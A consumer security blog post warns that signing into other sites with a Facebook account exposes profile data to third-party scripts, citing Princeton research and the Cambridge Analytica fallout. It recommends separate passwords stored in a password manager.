Logon Using Facebook ID? Understand the Devil’s Bargain You Made
Security. Convenience. Pick one! That is my forever mantra.
Now we are finding out that when you login to your favorite site using “Login with Facebook” your data is exposed to third parties. Nice.
According to research from “Freedom to Tinker” at Princeton, when a user logs in using Facebook’s API, Javascript on the site is able to grab your profile data and email address and maybe more.
Facebook, currently in a world of hurt (worldwide) over the Cambridge Analytica mess is magically very sensitive to people – other than them – stealing your data.
As of right now, they have suspending the ability to link Userids to Facebook profile pages and are looking at what else they are willing to do to contain the damage while not damaging their business model of allowing everyone to capture and sell your data.
If all of a sudden web site operators and advertisers can no longer scrape your data, ad revenue may be flushed down the toilet.
Information for this post came from CNBC.
So, given the above, what should you do?
First I want to make one thing clear. Facebook is only one culprit in this game and while it is fun beating Facebook up, we should not lose track of the bigger picture.
Anytime you login to website “B” using the userid and password from website “A” (such as using your Facebook ID to log into BandsInTown), you run the risk of exposing yourself.
While right now we are only talking about your profile and email being exposed, the developer API documentation on Facebook’s web site says:
To ask for any other permission, your app will need to be reviewed by Facebook before these permission become visible in the Login Dialog to the public who’re logging into your app with Facebook.
I gather this means that other apps may have more of your information than we are talking about in this situation based on how well the app developer has conned Facebook (think Cambridge Analytica) or even how much they paid Facebook.
Also, the site that you are using your Facebook ID to login to with could compromise your ID and password and then all other sites that you also login to with your Facebook ID will also be exposed.
The best solution to this is log in to each site with its own userid and password.
Use a password manager to track this for you . Most password managers will pick crazy passwords for you and since they enter them in the login page automatically for you, you don’t have to remember them. Win-Win – better passwords and easier for you.
If you are not willing to do this, then, at least, only do this for accounts that you don’t care about – what I call throw away accounts. Don’t do it for any account that has access to your credit card information (any e-commerce site) or bank account information.
Ultimately, the choice is yours. Security or convenience, pick one.
And Facebook is only one site that does this shared login thing. The problem is the same with all of them. The list of OAuth providers (which is the technical term for what this process is) is long including Google, Etsy, Flickr, Instragram and many more – see a list of them here.